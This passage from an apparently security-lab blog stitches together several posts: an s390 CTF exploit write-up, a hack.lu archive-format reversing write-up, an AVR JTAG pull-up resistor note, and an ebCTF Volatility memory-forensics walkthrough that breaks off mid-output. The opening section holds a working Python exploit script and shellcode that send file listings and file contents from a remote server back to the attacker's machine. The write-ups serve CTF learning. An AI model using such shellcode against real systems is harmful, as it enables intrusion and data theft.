The least significant byte of each of these values must now be xored with the corresponding offset to obtain the key.
Offsets: (0x800010e0 - 0x80000d7c) >> 2 = 0xd9 (0x80000dc4 - 0x80000d7c) >> 2 = 0x12 (0x80001014 - 0x80000d7c) >> 2 = 0xa6 (0x800010b4 - 0x80000d7c) >> 2 = 0xce Key: 0xcea612d9 ^ 0xff48cd6d = 0x31eedfb4
So, when this process receives
0x31eedfb4
via UDP, it jumps to the buffer address. To prevent SIGSEGV or SIGILL when the process executes the first instruction of the shellcode, we first need to complete the opcode
0xdfb4
to get a valid instruction:31 ee lner %f14,%f14 df b4 0f 00 00 00 edmk 0(181,%r15),0
Exploit
Here is the python script that we used to generate shellcodes using
s390-linux-as
ands390-linux-objcopy
and send it to the remote machine:import socket import subprocess SERVER_IP = "109.233.61.11" CLIENT_IP = # local ip UDP_PORT = 31337 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto("Hi !", (SERVER_IP, UDP_PORT)) print sock.recvfrom(1024)[0] port = sock.getsockname()[1] asm = open("exploit200.s").read() asm = asm.replace("____", hex(port)[2:]) asm = asm.replace("-------", CLIENT_IP) p = subprocess.Popen("s390-linux-as -o exploit200", stdin=subprocess.PIPE, shell=True) p.communicate(asm) p = subprocess.Popen("s390-linux-objcopy -O binary exploit200 /dev/stdout", stdout=subprocess.PIPE, shell=True) sock.sendto(p.communicate()[0], (SERVER_IP, UDP_PORT)) print sock.recvfrom(1024)[0] sock.sendto("\x31\xee\xdf\xb4", (SERVER_IP, UDP_PORT)) print sock.recvfrom(1024)[0]
Listing the current directory
The first step of this exploit is to list the current directory to find the file which contains the flag. This can be done by filling a buffer with
getdents
syscall and then send it via UDP to the local machine..long 0x00000000 .long 0xf0000000 exploit: /* open */ lhi %r1, 5 larl %r2, dir lhi %r3, 0 lhi %r4, 0 svc 0 /*getdents*/ lhi %r1, 141 lgr %r3,%r11 afi %r3, 4096 lghi %r4, 4096 svc 0 /* sendto */ lgr %r4,%r2 lgr %r2,%r10 lgr %r3,%r11 afi %r3, 4096 lghi %r5,0 larl %r6, addr afi %r12, -1272 lghi %r1,16 stg %r1,160(%r15) balr %r14, %r12 addr: .quad 0x02____------- dir: .string "."
Response:
\x00\x00\x00\x00\x00\x00\x00\x11\x0fe\x95\xe2\xb6>!I\x00 nohup.out\x00\x00 \x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x12\x1c\t^\r\x82\x91T\xe0\x00\x18 zpwn\x00\x08\x00\x00\x00\x00\x00\x00\x00\x0c2z)5\x13T\xc6\x17\x00\x18.\x00 \x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x13?F\xf4bC\\\xcf\xda\x00( .bash_history\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00 \x00\rB\xf6H\x1f\x00 \xb1\xb4\x00 .bash_logout\x00\x08\x00\x00\x00\x00\x00 \x00\x00\x0fN_\x88r\x1b\xbc\x90L\x00 .bashrc\x00\x00\x00\x00\x00\x00\x08 \x00\x00\x00\x00\x00\x00\x00\x02OpO/F\x88\x8f\x00\x00\x18..\x00\x00\x00 \x04\x00\x00\x00\x00\x00\x00\x00\x0eY{P\xb5\xc3\xe0\x02\xf0\x00 .profile \x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x16m\x9cn\xc56.\x9a\x91 \x00 watchdog.sh\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x7f\xff\xff\xff \xff\xff\xff\xff\x00 flag.txt\x00\x00\x00\x00\x00\x08
Thanks to
getdents
’s buffer, we can then see that a fileflag.txt
exists in the current directory.Reading flag.txt
Let’s try to open
flag.txt
and read its contents:.long 0x00000000 .long 0xf0000000 exploit: /* open */ lhi %r1, 5 larl %r2, flag lhi %r3, 0 lhi %r4, 0 svc 0 /*read*/ lhi %r1, 3 lgr %r3,%r11 afi %r3, 4096 lhi %r4, 4096 svc 0 /* sendto */ lgr %r4,%r2 lgr %r2,%r10 lgr %r3,%r11 afi %r3, 4096 lghi %r5,0 larl %r6, addr afi %r12, -1272 lghi %r1,16 stg %r1,160(%r15) balr %r14, %r12 addr: .quad 0x02____------- flag: .string "./flag.txt"
And it worked, giving us the flag:
CTF{684eed23a11fd416bb56b809d491eef4}
hack.lu 2013: FluxArchiv Write-up (both parts)
For this exercise with two parts (400 and 500 points), we were given two files: a binary named
archiv
and some data namedFluxArchiv.arc
. The two parts involved the same binary. When running the binary with no options, it displays a usage message containing the different possible options. We have:
- An option to list the files contained in the archive.
- An option to add a file to the archive.
- An option to extract a file from the archive.
- An option to delete a file in the archive.
Every command takes at least the archive name and a password. The last three also take a filename.
If you want to try it, it was dumped here, thanks to Jonathan Salwan.
Part 1: Find the password
Sooo, the first part of the exercise requires us to find the password of the archive
FluxArchiv.arc
given. We started reversing the binary and noticed a first thing: Awesome, the symbols were not stripped! … Well actually they were shuffled, which is not that good, but it is not a real problem either. In this write-up, we will always keep the wrong names, but explain what they actually do. We started following the path in
main
that lists the files and followed the code to understand what is done to the password. This can be easily done by following parsing of the command line arguments.The first function called on the password argument is incorrectly named
checkHashOfPassword
. It will initialize a global buffer of length0x14
namedhash_of_password
(correctly) with the SHA-1 digest of the given password. This function is simple.If we continue to follow the listing option, it then checks that it can
access
the archive file given,fopen
s it and then callsencryptDecryptData
, that really only checks the magic number of the archive format, at position0x0
:FluxArhiv13
.If this went OK, it will then call
verifyArchiv
. This function will do the interesting thing for this part. It will check that our password is correct.It first
fseek
s to offset0xC
, and then reads0x14
from the archive: another SHA-1 digest. Then it will fill an internal buffer with a re-ordered version ofhash_of_password
. It will then take this buffer and calculate the SHA-1 digest of it. This digest is compared to the one read from the archive. If it matches, the password is good.So, in summary, the password is good if
sha1(reorder(sha1(password)))
equals the 20
bytes at offset0xC
in the archive.The subject says that the humans who created the archive were drunk and decided to use a 6 character, upper-case or digit password. That is
2.176.782.336
passwords possible. That looks brute-force worthy.We first wrote the reordering part (the one that calculates the source index) in python to compute them all. Once done, we decided to write something to brute-force the algorithm. The source code of the brute-forcer can be found here. With 8 threads, it takes 2 minutes and 30-something seconds to go through the whole password space on my i7, and outputs one password:
PWF41L
.Part 1 solved. For those interested, the archive contains 3 images and one mp3 file. They are not really useful.
Part 2: Find more!
OK so now that we have the password we can decrypt the data. Yes, indeed, the data is encrypted with RC4, using
hash_of_password
as the key. The decrypt part is in the functionsanitizeFilename
. First interesting thing: it is called a lot, and it always resets RC4. So you can’t decipher the whole archive in one shot. Damn, we must understand the format then.The code is quite simple, but I am honestly bad at reverse engineering, so I decided to take this opportunity to try another approach for once: rewrite the program in C.
The complete source code can be downloaded here. It doesn’t contain the whole program but only the parts I needed to understand what the program was doing and how to finish this part.
I started by scrolling the functions randomly and trying to understand the simple ones. One that was really useful was
listAllFilesInArchiv
.First, we can see in it a pattern we will find a lot: read 8 bytes, decrypt it and reverse it in a value byte per byte. I called this function
read_int
in my C code, it reads a 64-bit integer and switches its endianness.So the function reads two integers (
a
andb
) and then starts to do the interesting thing: It will clear both with zeros. Then it clears a field of size0x10
, and then a field of size0x60
.Another pattern we will find often is a loop for
i
from0
tob
excluded, seek toa
, read the integer at that position and use it as nexta
, then clear it and continue. In short,a
is the offset of the next block in a linked list of blocks, and the first block contains 4 fields, with the second one being the number of blocks. Later we discovered that this is necessary because the last block doesn’t begin with an offset set to 0, but to some value to permit calculating its actual size. Here is the C:void listAllFilesInArchiv(FILE* stream, unsigned int off) { // delete_file char ptr[0x8]; uint64_t counter; uint64_t curpos; uint64_t nbblocks; uint64_t nextblock; fseek(stream, off, SEEK_SET); nextblock = read_int(stream); nbblocks = read_int(stream); fseek(stream, off, SEEK_SET); clear_data(stream, 8); clear_data(stream, 8); clear_data(stream, MD5_DIGEST_LENGTH); clear_data(stream, FILENAME_SZ); for (counter = 0; counter < nbblocks; ++counter) { fseek(stream, nextblock * 1040 + 0x20, SEEK_SET); curpos = ftell(stream); nextblock = read_int(stream); fseek(stream, curpos, SEEK_SET); clear_data(stream, 8); } }
The second interesting thing about this function is that it is called on delete (we can see it from command parsing). So an interesting thing arises: if a file was added and then deleted, its data is still present in the archive. It is only deleted from the listing and its blocks are considered “free”.
The offset given to it comes from
extractFileFromArchiv
. This function starts by seeking to offset0x20
, so just after the global magic + the SHA-1 for the password. It checks a magic (“FluXL1sT”), then reads an integer and then checks for 8 structures of 128 bytes. This is the index! The integer read, if not null, is a link to the next list of 8 files (still beginning by the magic).Now we have enough to use my technique to find the unused blocks, but I actually rewrote the complete file listing and extraction to make sure I did it correctly. I then basically logged every block used: all blocks used are 1040 bytes long (this is why we have 8 entries of 128 bytes). I then compared it to the possible list of blocks and just decrypted these blocks. The key was in block at address
0x28a20 + 0x8
:$ python hacklu2013-fluxarchiv-unused-blocks.py logs Found unused block: 0x28200 Found unused block: 0x28610 Found unused block: 0x28a20 [...] $ python hacklu2013-fluxarchiv-decrypt.py 0x28a28 0x410 b"[...] alike.\n\n+++The Mentor+++\n\nFlag: D3letinG-1nd3x_F4iL\n\n[...]"
Example logs here.
Conclusion
I didn’t finish the second part in time to have the points. I actually used techniques that took a lot of time, and I was quite slow anyway. My goal was not productivity. I took the first part as an opportunity to check that I remembered how to use
pthread
and the second part as a good example to try another technique for reverse engineering I never used before. Although it was a “slow” technique, it really helped me organise my thoughts and test/fetch data (like the offsets of used blocks, even though it was possible without).It was interesting to see. Next time will be for speed!
Dealing with the pull-up resistors on AVR
My internship project was to design a temperature monitoring system for the LSE server room. Several homemade temperature probes, based on NTC thermistors, are now arranged in the laboratory. Each of them is connected to a USB interface with a RJ-45 cable.
The interface is based on an Atmel
AT90USBKEY
, a development board based on anAT90USB1287
microcontroller. It features a 10-bit successive approximation Analog-to-Digital Converter connected to an 8-channel Analog Multiplexer and a USB controller, which allows us to create a proper USB HID device. The host probes the interface to get the values of the different temperature sensors and collects them thanks to StatsD. The interface is exposed as a character device if it’s bound to the appropriate driver and can communicate with the user space via
ioctl()
syscall. In our case, the interface is connected to a Sheevaplug, an ARM-based plug computer, which probes the values every 10 seconds and sends them to the StatsD server via UDP.
The first problem I had to face is the strange values returned by the ADC on the channels 4 to 7 when no analog pin is connected:
$ cat /proc/temp_sensors T0: 478 T1: 473 T2: 471 T3: 383 T4: 1019 T5: 1023 T6: 1023 T7: 1023
1023 is the maximum value of the ADC result, this means that the analog inputs were subject to a voltage equal to the reference voltage (here, Varef = 3.3V).
Thanks to
AT90USB1287
documentation, we can see that pins PF4, PF5, PF6 and PF7 are also used by the JTAG interface.Port F pins alternate functions
If the JTAG interface is enabled, the pull-up resistors on pins PF7(TDI), PF5(TMS) and PF4(TCK) will be activated even if a Reset occurs. (AT90USB1287 specifications, Page 88)
In fact, it seems that the pin PF6 (TDO) pull-up resistor is also activated when the JTAG interface is enabled.
The input impedance of a converter is very high (due to internal operational amplifier), this justifies the fact that we find the voltage reference in the analog channels 4 to 7.
If we wanted to keep the JTAG enabled, the schematic of the electronic circuit would be:
The equivalent resistor Rh can easily be calculated:
Then, the resistance of the thermistor, which represents the current temperature, is given by:
Theoretically, we could consider this pull-up resistor in the calculation of the thermistor. However, the
AT90USB1287
specifications indicate that the values of the pull-up resistors are contained between 20KΩ and 50KΩ. This interval is too large to properly calibrate the sensors.Never mind: let’s disable the JTAG interface! We don’t really need it in our case.
The first way to do it is to unprogram JTAGEN fuse of the microcontroller. However, I can only use DFU (Device Firmware Upgrade) to program the device because I do not have the required equipment to use ICSP, JTAG or parallel programming for this kind of chip and, unfortunately, Fuses cannot be reprogrammed by the bootloader.
The other way is to set the bit JTD in the MCUCR register. In order to avoid unintentional disabling or enabling, the specifications require the application software to write this bit to the desired value twice within four cycles to change its value. This can be done with the following instructions:
asm volatile ("out %1, %0" "\n\t" "out %1, %0" "\n\t" : : "r" ((uint8_t) 1 << JTD), "i" (_SFR_IO_ADDR(MCUCR)));
Afterwards, the analog inputs 4 to 7 will get a normal behaviour and we can now use them to collect the different temperatures.
$ cat /proc/temp_sensors T0: 478 T1: 383 T2: 348 T3: 376 T4: 310 T5: 278 T6: 257 T7: 107
All values returned by the device are proportional to the thermistors voltage. As Negative Temperature Coefficient thermistors, their resistance goes up as temperature goes down and the temperature/resistance curve is not linear. The temperature (°C) can be calculated from this resistance with the following expression:
- Rt = thermistor resistance (Ω)
- Rh = second bridge resistor (Ω)
- β = NTC parameter equation (here, β = 4092)
- T0 = 298 K (273 K + 25 K, i.e. 25 °C)
- K0 = 273 K (= 0 °C)
Finally, this temperature monitoring system seems to work and we are now able to see how the temperatures of the laboratory evolve as a function of time.
Evolution of temperatures (°C) as a function of time
LSE Summer Week 2013 Videos
The videos for the LSE Summer Week 2013 are now available, you can find all of them on the page of the event.
All the talks are in French, but the slides are in English.
They are available as a direct download or a youtube link. There are 2 videos that are still missing, they will be available as soon as we get them.
For the LSE Winter Day 2013, we had some issues with the recording, but we have uploaded them anyway, you can see them on youtube, or directly on the event page, sorry in advance for the bad recording.
ebCTF 2013: FOR100
After a recent attack, we found this encrypted file. Luckily, we made a memory dump, can you decrypt the file? Archive password: lcoXse3oa3Uicioc http://ebctf.nl/files/883f6fdf1a87b7651b7216e1354a7e1f/flag http://194.171.96.106/ebctf/memory.7z
We took this exercise as an opportunity to learn to use volatility, so this writeup will be a little overcomplicated, we could have just done it with strings/grep, but it was a great way to learn more about how to search and exploit memory dump.
To begin with, we have a memory dump of a VirtualBox VM :
$ file memory.dump memory.dump: ELF 64-bit LSB core file x86-64, version 1 (SYSV) $ readelf -n memory.dump Notes at offset 0x000002a8 with length 0x00000480: Owner Data size Description VBCORE 0x00000018 Unknown note type: (0x00000b00) VBCPU 0x00000440 Unknown note type: (0x00000b01)
A little examination of the raw data indicates that it should be a linux, as we see the grub code in memory, and some indication of a kernel version :
BOOT_IMAGE=/boot/vmlinuz-3.5.0-23-generic root=UUID=d45d9170-0f93-4ff4-b5a5-be89760c0d77 ro
A little more search indicates that it is an Ubuntu 12.04
x86_64
image.In order to use volatility on linux dumps, we must build or find a profile of the kernel. Instructions for building a profile for a kernel can be found here.
With this profile in place we can now start to tinker with our dump. Let’s start with the process list :
$ vol.py --profile=LinuxUbuntu1204x64 -f memory.dump linux_pslist Volatile Systems Volatility Framework 2.3_beta Offset Name Pid Uid Gid DTB Start Time ------------------ -------------------- --------------- --------------- ------ ------------------ ---------- 0xffff88000f9b0000 init 1 0 0 0x000000000aff1000 2013-07-21 19:19:32 UTC+0000 0xffff88000f9b1700 kthreadd 2 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000f9b2e00 ksoftirqd/0 3 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa48000 migration/0 6 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa49700 watchdog/0 7 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa4ae00 cpuset 8 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa4c500 khelper 9 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa4dc00 kdevtmpfs 10 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa68000 netns 11 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa69700 sync_supers 12 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa6ae00 bdi-default 13 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa6c500 kintegrityd 14 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fa6dc00 kblockd 15 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fb00000 ata_sff 16 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fb01700 khubd 17 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000fb02e00 md 18 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000db90000 khungtaskd 21 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000db91700 kswapd0 22 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000db92e00 ksmd 23 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000db94500 fsnotify_mark 24 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000db95c00 ecryptfs-kthrea 25 0 0 ------------------ 2013-07-21 19:19:32 
UTC+0000 0xffff88000d5f0000 crypto 26 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000d7a5c00 kthrotld 35 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000d7a2e00 scsi_eh_0 36 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000d7a1700 kworker/u:2 37 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000d7a0000 scsi_eh_1 38 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000d5f5c00 scsi_eh_2 39 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000d5f4500 kworker/u:3 40 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000d5f1700 binder 42 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000f011700 deferwq 62 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000f012e00 charger_manager 63 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000f014500 devfreq_wq 64 0 0 ------------------ 2013-07-21 19:19:32 UTC+0000 0xffff88000ee35c00 jbd2/sda1-8 201 0 0 ------------------ 2013-07-21 19:19:33 UTC+0000 0xffff88000ee30000 ext4-dio-unwrit 202 0 0 ------------------ 2013-07-21 19:19:33 UTC+0000 0xffff88000ec7dc00 kworker/0:3 220 0 0 ------------------ 2013-07-21 19:19:35 UTC+0000 0xffff88000ec78000 upstart-udev-br 288 0 0 0x000000000ada3000 2013-07-21 19:19:37 UTC+0000 0xffff88000f2ddc00 udevd 332 0 0 0x000000000ef46000 2013-07-21 19:19:37 UTC+0000 0xffff88000c291700 udevd 496 0 0 0x000000000c2a6000 2013-07-21 19:19:37 UTC+0000 0xffff88000c292e00 udevd 497 0 0 0x000000000c2c1000 2013-07-21 19:19:37 UTC+0000 0xffff88000c838000 kpsmoused 546 0 0 ------------------ 2013-07-21 19:19:37 UTC+0000 0xffff88000c4c9700 upstart-socket- 638 0 0 0x000000000d939000 2013-07-21 19:19:38 UTC+0000 0xffff88000ee31700 dhclient3 706 0 0 0x000000000f0fb000 2013-07-21 19:19:38 UTC+0000 0xffff88000c4cc500 rsyslogd 720 101 103 0x000000000c600000 2013-07-21 19:19:38 UTC+0000 0xffff88000c83ae00 sshd 729 0 0 0x000000000bbce000 2013-07-21 19:19:38 UTC+0000 0xffff88000c4cdc00 dbus-daemon 759 
102 105 0x000000000c538000 2013-07-21 19:19:38 UTC+0000 0xffff88000d1aae00 getty 822 0 0 0x000000000c641000 2013-07-21 19:19:38 UTC+0000 0xffff88000c62c500 getty 827 0 0 0x000000000d98c000 2013-07-21 19:19:38 UTC+0000 0xffff88000c839700 login 831 0 1000 0x000000000f28d000 2013-07-21 19:19:38 UTC+0000 0xffff88000c83dc00 getty 832 0 0 0x000000000d9c1000 2013-07-21 19:19:38 UTC+0000 0xffff88000c4cae00 getty 834 0 0 0x000000000c684000 2013-07-21 19:19:38 UTC+0000 0xffff88000d0a4500 acpid 837 0 0 0x000000000c315000 2013-07-21 19:19:39 UTC+0000 0xffff88000c83c500 cron 839 0 0 0x000000000d9da000 2013-07-21 19:19:39 UTC+0000 0xffff88000d1a9700 atd 840 0 0 0x000000000c327000 2013-07-21 19:19:39 UTC+0000 0xffff88000da11700 login 896 0 1000 0x000000000ae44000 2013-07-21 19:19:39 UTC+0000 0xffff88000c514500 whoopsie 901 103 106 0x000000000dae3000 2013-07-21 19:19:39 UTC+0000 0xffff88000bb15c00 bash 1064 1000 1000 0x000000000c6f0000 2013-07-21 19:19:46 UTC+0000 0xffff88000af90000 kworker/0:0 1313 0 0 ------------------ 2013-07-21 19:24:35 UTC+0000 0xffff88000af94500 kworker/0:2 1314 0 0 ------------------ 2013-07-21 19:29:36 UTC+0000 0xffff88000af91700 kworker/0:1 1315 0 0 ------------------ 2013-07-21 19:34:37 UTC+0000 0xffff88000af95c00 kworker/0:4 1316 0 0 ------------------ 2013-07-21 19:35:46 UTC+0000 0xffff88000af92e00 python2 1317 1000 1000 0x000000000c6fb000 2013-07-21 19:36:09 UTC+0000 0xffff88000d0a5c00 bash 1454 1000 1000 0x000000000d8c8000 2013-07-21 19:36:23 UTC+0000 0xffff88000f9b4500 flush-8:0 1552 0 0 ------------------ 2013-07-21 19:36:28 UTC+0000
As we can see here, we have a python2 instance launched (pid 1317). Let’s examine the bash history, in order to see exactly what and how it has been launched. It is a quite long process, but with it we should be able to see exactly what was launched.
$ vol.py --profile=LinuxUbuntu1204x64 -f memory.dump linux_bash Volatile Systems Volatility Framework 2.3_beta Pid Name Command Time Command -------- -------------------- ------------------------------ ------- 1064 bash 2013-07-21 19:19:47 UTC+0000 ps aux | grep ssh 1064 bash 2013-07-21 19:19:47 UTC+0000 sudo poweroff 1064 bash 2013-07-21 19:19:47 UTC+0000 ip addr 1064 bash 2013-07-21 19:20:53 UTC+0000 ls 1064 bash 2013-07-21 19:21:05 UTC+0000 python2 ctf.py 1064 bash 2013-07-21 19:21:29 UTC+0000 python2 ctf.py ' i hide my ' 1454 bash 2013-07-21 19:36:23 UTC+0000 ps aux | grep ssh 1454 bash 2013-07-21 19:36:23 UTC+0000 sudo poweroff 1454 bash 2013-07-21 19:36:23 UTC+0000 ip addr 1454 bash 2013-07-21 19:36:29 UTC+0000 ps aux | grep python 1454 bash 2013-07-21 19:37:04 UTC+0000 kill -s SIGUSR1 1317
Ok, so we have a python2 script
ctf.py
launched and, after that, sent a SIGUSR1
signal. The code should still be in memory but, sadly, not in the Python process memory: the script had been compiled before, so the second launch should only have loaded the
pyc
file. But if we search the memory dump, we can simply grep for
SIGUSR1
there should not be a lot of instance of it. And with that we get :import sys import time import random import signal from Crypto.Cipher import AES key1 = "is this where" key2 = sys.argv[1] key3 = raw_input("Password: ") iv = 'a very random iv' secret = './flag' mode = AES.MODE_CBC def encrypt(signum, frame): key = key1 + key2 + key3 enc = AES.new(key, mode, iv) inp = raw_input("Enter secret: ") diff = len(inp) % 16 if diff != 0: inp += ' ' * (16 - diff) with open(secret, 'wb') as outfile: outfile.write(enc.encrypt(inp)) del key, enc def decrypt(signum, frame): key = key1 + key2 + key3 enc = AES.new(key, mode, iv) with open(secret, 'rb') as infile: print(enc.decrypt(infile.read(48))) del key, enc signal.signal(signal.SIGUSR1, encrypt) signal.signal(signal.SIGUSR2, decrypt) while True: time.sleep(1)
Now we have the code. There is a decrypt function that should give us the flag. We have found
key2
in the bash history: it was ' i hide my '
. What we are still missing is the key3
string. So let’s look at the python process memory.$ vol.py --profile=LinuxUbuntu1204x64 -f memory.dump linux_proc_maps -p 131 Volatile Systems Volatility Framework 2.3_beta Pid Start End Flags Pgoff Major Minor Inode File Path -------- ------------------ ------------------ ------ ------------------ ------ ------ ---------- -------------------------------------------------------------------------------- $ vol.py --profile=LinuxUbuntu1204x64 -f memory.dump linux_proc_maps -p 1317 Volatile Systems Volatility Framework 2.3_beta Pid Start End Flags Pgoff Major Minor Inode File Path -------- ------------------ ------------------ ------ ------------------ ------ ------ ---------- -------------------------------------------------------------------------------- 1317 0x0000000000400000 0x0000000000671000 r-x 0x0 8 1 1273 /usr/bin/python2.7 1317 0x0000000000870000 0x0000000000871000 r-- 0x270000 8 1 1273 /usr/bin/python2.7 1317 0x0000000000871000 0x00000000008da000 rw- 0x271000 8 1 1273 /usr/bin/python2.7 1317 0x00000000008da000 0x00000000008ec000 rw- 0x0 0 0 0 1317 0x0000000002109000 0x0000000002200000 rw- 0x0 0 0 0 [heap] 1317 0x00007f7e9a000000 0x00007f7e9a001000 rw- 0x0 0 0 0 1317 0x00007f7e9a001000 0x00007f7e9a009000 r-x 0x0 8 1 146852 /usr/lib/python2.7/dist-packages/Crypto/Cipher/AES.so 1317 0x00007f7e9a009000 0x00007f7e9a208000 --- 0x8000 8 1 146852 /usr/lib/python2.7/dist-packages/Crypto/Cipher/AES.so 1317 0x00007f7e9a208000 0x00007f7e9a209000 r-- 0x7000 8 1 146852 /usr/lib/python2.7/dist-packages/Crypto/Cipher/AES.so 1317 0x00007f7e9a209000 0x00007f7e9a20a000 rw- 0x8000 8 1 146852 /usr/lib/python2.7/dist-packages/Crypto/Cipher/AES.so 1317 0x00007f7e9a20a000 0x00007f7e9a4d3000 r-- 0x0 8 1 8358 /usr/lib/locale/locale-archive 1317 0x00007f7e9a4d3000 0x00007f7e9a4e8000 r-x 0x0 8 1 713 /lib/x86_64-linux-gnu/libgcc_s.so.1 1317 0x00007f7e9a4e8000 0x00007f7e9a6e7000 --- 0x15000 8 1 713 /lib/x86_64-linux-gnu/libgcc_s.so.1 1317 0x00007f7e9a6e7000 0x00007f7e9a6e8000 r-- 
0x14000 8 1 713 /lib/x86_64-linux-gnu/libgcc_s.so.1 1317 0x00007f7e9a6e8000 0x00007f7e9a6e9000 rw- 0x15000 8 1 713 /lib/x86_64-linux-gnu/libgcc_s.so.1 1317 0x00007f7e9a6e9000 0x00007f7e9a89e000 r-x 0x0 8 1 968 /lib/x86_64-linux-gnu/libc-2.15.so 1317 0x00007f7e9a89e000 0x00007f7e9aa9d000 --- 0x1b5000 8 1 968 /lib/x86_64-linux-gnu/libc-2.15.so 1317 0x00007f7e9aa9d000 0x00007f7e9aaa1000 r-- 0x1b4000 8 1 968 /lib/x86_64-linux-gnu/libc-2.15.so 1317 0x00007f7e9aaa1000 0x00007f7e9aaa3000 rw- 0x1b8000 8 1 968 /lib/x86_64-linux-gnu/libc-2.15.so 1317 0x00007f7e9aaa3000 0x00007f7e9aaa8000 rw- 0x0 0 0 0 1317 0x00007f7e9aaa8000 0x00007f7e9aba3000 r-x 0x0 8 1 978 /lib/x86_64-linux-gnu/libm-2.15.so 1317 0x00007f7e9aba3000 0x00007f7e9ada2000 --- 0xfb000 8 1 978 /lib/x86_64-linux-gnu/libm-2.15.so 1317 0x00007f7e9ada2000 0x00007f7e9ada3000 r-- 0xfa000 8 1 978 /lib/x86_64-linux-gnu/libm-2.15.so 1317 0x00007f7e9ada3000 0x00007f7e9ada4000 rw- 0xfb000 8 1 978 /lib/x86_64-linux-gnu/libm-2.15.so 1317 0x00007f7e9ada4000 0x00007f7e9adba000 r-x 0x0 8 1 4874 /lib/x86_64-linux-gnu/libz.so.1.2.3.4 1317 0x00007f7e9adba000 0x00007f7e9afb9000 --- 0x16000 8 1 4874 /lib/x86_64-linux-gnu/libz.so.1.2.3.4 1317 0x00007f7e9afb9000 0x00007f7e9afba000 r-- 0x15000 8 1 4874 /lib/x86_64-linux-gnu/libz.so.1.2.3.4 1317 0x00007f7e9afba000 0x00007f7e9afbb000 rw- 0x16000 8 1 4874 /lib/x86_64-linux-gnu/libz.so.1.2.3.4 1317 0x00007f7e9afbb000 0x00007f7e9b15a000 r-x 0x0 8 1 1604 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 1317 0x00007f7e9b15a000 0x00007f7e9b359000 --- 0x19f000 8 1 1604 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 1317 0x00007f7e9b359000 0x00007f7e9b374000 r-- 0x19e000 8 1 1604 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 1317 0x00007f7e9b374000 0x00007f7e9b37f000 rw- 0x1b9000 8 1 1604 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 1317 0x00007f7e9b37f000 0x00007f7e9b383000 rw- 0x0 0 0 0 1317 0x00007f7e9b383000 0x00007f7e9b3d5000 r-x 0x0 8 1 1603 /lib/x86_64-linux-gnu/libssl.so.1.0.0 1317 0x00007f7e9b3d5000 
0x00007f7e9b5d5000 --- 0x52000 8 1 1603 /lib/x86_64-linux-gnu/libssl.so.1.0.0 1317 0x00007f7e9b5d5000 0x00007f7e9b5d8000 r-- 0x52000 8 1 1603 /lib/x86_64-linux-gnu/libssl.so.1.0.0 1317 0x00007f7e9b5d8000 0x00007f7e9b5de000 rw- 0x55000 8 1 1603 /lib/x86_64-linux-gnu/libssl.so.1.0.0 1317 0x00007f7e9b5de000 0x00007f7e9b5df000 rw- 0x0 0 0 0 1317 0x00007f7e9b5df000 0x00007f7e9b5e1000 r-x 0x0 8 1 986 /lib/x86_64-linux-gnu/libutil-2.15.so 1317 0x00007f7e9b5e1000 0x00007f7e9b7e0000 --- 0x2000 8 1 986 /lib/x86_64-linux-gnu/libutil-2.15.so 1317 0x00007f7e9b7e0000 0x00007f7e9b7e1000 r-- 0x1000 8 1 986 /lib/x86_64-linux-gnu/libutil-2.15.so 1317 0x00007f7e9b7e1000 0x00007f7e9b7e2000 rw- 0x2000 8 1 986 /lib/x86_64-linux-gnu/libutil-2.15.so 1317 0x00007f7e9b7e2000 0x00007f7e9b7e4000 r-x 0x0 8 1 967 /lib/x86_64-linux-gnu/libdl-2.15.so 1317 0x00007f7e9b7e4000 0x00007f7e9b9e4000 --- 0x2000 8 1 967 /lib/x86_64-linux-gnu/libdl-2.15.so 1317 0x00007f7e9b9e4000 0x00007f7e9b9e5000 r-- 0x2000 8 1 967 /lib/x86_64-linux-gnu/libdl-2.15.so 1317 0x00007f7e9b9e5000 0x00007f7e9b9e6000 rw- 0x3000 8 1 967 /lib/x86_64-linux-gnu/libdl-2.15.so 1317 0x00007f7e9b9e6000 0x00007f7e9b9fe000 r-x 0x0 8 1 972 /lib/x86_64-linux-gnu/libpthread-2.15.so 1317 